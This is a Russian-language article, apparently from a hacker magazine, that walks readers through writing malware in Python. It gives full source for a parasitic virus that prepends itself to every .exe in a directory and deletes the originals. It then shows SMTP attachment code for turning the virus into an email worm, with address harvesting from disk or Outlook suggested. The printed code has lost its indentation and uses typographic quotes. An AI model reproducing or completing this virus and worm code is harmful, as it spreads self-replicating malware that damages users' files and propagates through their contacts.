Содержание статьи
Новый год — самое время для легких извращений. Хотя для тебя, читающего эту статью практически весной, год уже не новый, да и сама идея изучения вируса, написанного на питоне, может показаться вовсе даже не легким извращением…
Как известно, с помощью питона можно решать множество повседневных, рутинных задач: периодическое резервное копирование файлов, отправка писем по электронной почте, поиск и выполнение различных действий с файлами на жестком диске и прочее. Так как Python является языком программирования высокого уровня, то и вирусы на нем можно писать соответствующие. Зловреды, созданные с помощью ЯВУ, обычно классифицируются как HLLx (High Level Language, x — метод размножения).
Существуют три основных подвида HLLx-вирусов: оверврайтеры (Overwrite) — HLLO, компаньоны (Companion) — HLLC и паразиты (Parasitic) — HLLP.
Первые являются достаточно примитивными программами, которые просто перезаписывают код жертвы своим кодом, вследствие чего оригинальная программа перестает существовать. Такие вирусы очень просты и весьма разрушительны. В результате эпидемии такой заразы пользовательский компьютер практически полностью лишается всего установленного ПО. Ничем иным кроме вандализма это назвать нельзя.
Вирусы-компаньоны более гуманны к исполняемым файлам, которые они «заражают». Слово «заражают» я специально взял в кавычки, так как на самом деле HLLC-зловреды просто присваивают себе имя жертвы, а оригинальный экзешник переименовывают (а могут и зашифровать — прим. ред.) во что-нибудь другое. Таким образом, они подменяют пользовательский софт своими копиями, а для большей маскировки запускают оригинальную программу из файла с новым именем. И пользователь доволен, и вирус остался жив. HLLP являются самыми продвинутыми из ЯВУ-вирусов. Они внедряются непосредственно в файл-жертву, сохраняя при этом работоспособность оригинального кода. Из-за особенностей высокоуровневых языков программирования полноценного инжекта, как у «взрослых» вирусов на ассемблере, добиться очень сложно. Поэтому паразиты получаются не слишком элегантными созданиями, но, к сожалению, это практически потолок того, что можно выжать из ЯВУ.
В связи с тем, что как HLLO-, так и HLLC-вирусы слишком примитивны и практически не встречаются в дикой природе, мы займемся разработкой здовреда-паразита. Основной метод, используемый ими для заражения — внедрение в один файл с кодом-жертвой.
Таким образом сохраняется код оригинальной программы, и при этом не появляется никаких лишних следов.
Существует много вариаций на тему HLLP-зловредов, но мы реализуем самую простую из них. Вирус будет писать в начало файлажертвы свое собственное тело — целиком, со всеми заголовками и служебными структурами. Код «хорошей» программы при этом будет смещен на длину вируса. То есть, сначала будет выполняться вирус, который в конце своего черного дела запустит оригинальную программу, чтобы лишний раз не вызывать подозрения у пользователя. По традиции взглянем на код:
Код HLLP-вируса
import sys
import os
import shutil
virPath = os.path.split(sys.argv[0]);
names = os.listdir('.');
fvir = open(sys.argv[0], 'rb');
virData = fvir.read(19456);
for name in names:
namePair = os.path.splitext(name);
if namePair[1] == '.exe' and
name != virPath[1]:
os.rename(name, name + 'tmp');
fprog = open(name + 'tmp', 'rb');
progData = fprog.read();
fnew = open(name, ‘wb’);
fnew.write(virData + progData);
fnew.close();
fprog.close();
os.remove(name + 'tmp');
origProgData = fvir.read();
origProg = 'original_' + virPath[1];
forig = open(origProg, 'wb');
forig.write(origProgData);
fvir.close();
forig.close();
os.execl(origProg, ' ');
Первым делом мы подключаем три модуля: sys, os, shutil. Модуль sys дает доступ к переменным, которые тесно связаны с интерпретатором или с выполняемым скриптом. Так, например, мы получаем имя выполняемого скрипта с помощью команды sys.argv[0]. Модуль os дает возможность выполнения команд, зависящих от операционной системы. Например, получить список файлов в директории, произвести над ними некоторые операции и так далее. Наконец, модуль shutil дает возможность копировать и перемещать файл на жестком диске.
После импорта нужных нам модулей мы узнаем имя файла, в котором содержится исходный код вируса. Затем с помощью команды os.listdir('.') получаем список файлов в текущей директории и проверяем, является ли очередной объект в списке экзешником.
Если проверка это подтверждает, то инфицируем найденный файл, просто заменив его собой. Если ты читал внимательно, то заметил, что в условии оператора if присутствует еще вот такая инструкция:
name != virPath[1],
а перед этим выполняется команда
virPath = os.path.split(sys.argv[0]).
Для чего это нужно, я расскажу в конце статьи, а пока двинемся дальше. Перед оператором if мы считываем в память собственное содержимое. Делается это с помощью команды fvir. read(19456). Число 19456 — это длина вируса (мы ведь должны учесть, что в файле находится не только вирус, но и жертва). Почему эта длина именно такая, я скажу чуть позже. Следующим шагом находим в текущей папке все exe’шники и заражаем их. Для этого, заранее переименовав невинную программку, мы читаем ее код в буфер, затем создаем новый файл с нужным нам именем и пишем туда сначала тело вируса, а после — считанный только что буфер. Далее сохраняем все это хозяйство и удаляем оригинальный файл жертвы с помощью команды os.remove(name+'tmp').
Теперь наступает самый ответственный момент — нам надо запустить оригинальный код, который мы предварительно засунули внутрь зловреда. Для этого просто читаем оставшиеся данные из образа вируса (мы ведь помним, что уже читали 19456 байт и указатель сместился в файле на эту позицию?), а затем сохраняем полученные данные во временный exe, который потом запускаем. Таким образом вирус корректно отработал, и при этом запустил нужную для пребывающего в счастливом неведении пользователя программу.
Конечно, наш зловред получился вовсе не без недостатков. Например, он не проверяет, инфицирован ли уже экзешник или нет, да и вбивать в код размер конечного файла вируса — не совсем удачное решение. Кроме того, у нашего питомца будут возникать проблемы при первом запуске, когда в образе находится только тело виря, а тело жертвы отсутствует. Но все эти проблемы при определенном старании вполне решаемы.
Главное для нас — продемонстрировать принцип работы.
Сетевой червь
Мы сделали классического инфектора, который распространяется путем заражения близлежащих программ. Но ведь есть еще и сетевые черви, которые используют интернет для порабощения мира. Зловреды такого типа не интересуются файловой системой компьютера, им нужен доступ в сеть.
Для распространения черви пользуются дырами в операционной системе и прикладных программах, рассылают себя по электронной почте и так далее. Мы попробуем сделать вирус, который будет использовать именно e-mail’ы.
Для начала давай посмотрим, как с помощью Python отправить письмо. Небольшой примерчик, от которого мы будем отталкиваться в дальнейшем:
Отправка письма
import smtplib
from email.mime.text import MIMEText
msg = MIMEText('Message text')
# me == email отправителя
# you == email получателя
msg['Subject'] = 'Test message'
msg['From'] = me
msg['To'] = you
s = smtplib.SMTP('')
s.sendmail(me, [you], msg.as_string())
s.quit()
Здесь мы используем библиотеку smtplib и входящий в нее пакет MIMEText. Код настолько прост, что не требует особых разъяснений. Единственное, на что стоит обратить внимание, так это на авторизацию на SMTP-сервере. Если для отправки сообщения требуется ввести логин и пароль, то придется вызвать еще одну дополнительную функцию. Так как наш вирус является файлом, нам надо приаттачить его к письму. Для этого придется импортировать еще пару дополнительных библиотек и написать немного кода.
Будет это выглядеть примерно так:
Отправка письма с вложением
import smtplib
import mimetypes
from email import encoders
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
outer = MIMEMultipart()
# me == email отправителя
# you == email получателя
outer['Subject'] = ‘Test message’
outer['From'] = me
outer['To'] = you
ctype, encoding = mimetypes.guess_type(path_to_file)
if ctype is None or encoding is not None:
ctype = 'application/octet-stream'
maintype, subtype = ctype.split(‘/’, 1)
fp = open(path_to_file, ‘rb’)
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
encoders.encode_base64(msg)
msg.add_header('Content-Disposition',
'attachment', filename=file_name)
outer.attach(msg)
s = smtplib.SMTP('')
s.sendmail(me, [you], outer.as_string())
s.quit()
В импорте у нас появилась библиотека mimetypes, а также модули encoders, MIMEMultipart и MIMEBase. MIMEMultipart позволяет формировать емайл-сообщение из различных видов данных (текст, картинки и прочее). MIMEBase работает с файлами произвольного типа — например, exe. В качестве основы сообщения мы берем переменную типа MIMEMultipart и добавляем к ней объект MIMEBase, в который предварительно считали и декодировали в base64 содержимое нужного нам файла.
Теперь, когда вирус может сам себя отправлять в электронном сообщении, дело осталось за малым — найти, кому отправить e-mail. Тут полет фантазии вирмейкера на питоне ничем не ограничен. Можно, например, поискать адреса на жестком диске, просканировав все имеющиеся на нем файлы. А можно воспользоваться адресной книгой Outlook. Для последнего тебе понадобится пакет Python Win32 Extensions.
Несколько замечаний
Самые сообразительные могут задать один маленький вопрос: «Питон — это скрипты, а exe — бинари. Как скриптом можно заразить исполняемый файл Windows?». Ответ на него очень прост — питоновские скрипты можно конвертировать в exeфайлы. Да-да, и делается это очень легко. Тут я описывать процесс не буду (ты ведь не хочешь, чтобы младшая сестренка, взяв в руки ][, получила бы исчерпывающее руководство по уничтожению твоего же компа :)), так что за подробностями — к Гуглу.
В связи с тем, что наши вирусы будут выполняться не как скрипты, а как полноценные win-приложения, в коде встретилась пара непонятных вещей, о которых я обещал рассказать позже. Первая из них — это вызов os.path.split(). Дело в том, что если мы запускаем питон-скрипт, то команда sys.argv[0] возвращает имя этого скрипта (например, virus.py). В случае же с exeфайлом результат будет другой — полный путь и имя экзешника (C:\Windows\virus.exe). А так как для дальнейших злодеяний нам нужно только имя файла, то мы вызываем os.path.split().
Еще одна загадка — это число 19456. Но тут уже легко можно догадаться, что это размер exe, полученного после конвертации скрипта. Ровно столько у меня весил зловред после своего перерождения в бинарный формат.
Заключение
Конечно, написание зловредов на Python — то еще извращение, но при большом желании такие поделки можно отшлифовать до нужной степени работоспособности, поставить на полку и всем показывать. К тому же вирус будет кроссплатформенным, а этим не каждый крутой вирмейкер может похвастаться :).